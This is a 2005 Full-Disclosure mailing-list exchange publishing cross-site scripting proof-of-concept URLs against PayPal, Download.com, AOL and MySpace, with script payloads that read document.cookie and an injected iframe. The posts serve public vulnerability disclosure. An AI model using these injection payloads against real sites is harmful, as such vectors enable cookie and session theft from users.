toss this one in... http://www.myspace.com/index.cfm?fuseaction=find&circuitaction=search&searchType=network&interesttype=&f_first_name=<iframe src="http://whatismyip.com";></iframe>&Submit=Find
i think redirects are more effective in showing xss, but cookies are nice too or other xss like <SCRIPT>alert(document.cookie);</SCRIPT> wood ----- Original Message ----- From: <[EMAIL PROTECTED]> To: <[email protected]> Sent: Wednesday, April 20, 2005 9:19 PM Subject: [Full-disclosure] Big Sites That Are Vulnerable To XSS > The following have been previously reposibly disclosed, and, because of the lack of action taken on the venders' parts, full disclosure is necessary to elliminate the threat of what's called "security by obscurity." > > paypal.com > http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!-- > > download.com > http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!-- > > aol.com* > https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D > > *on aol.com, the victim must be logged in to the website screenname service to be vulnerable. > > Regards, > Paul > Greyhats Security > http://greyhatsecurity.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
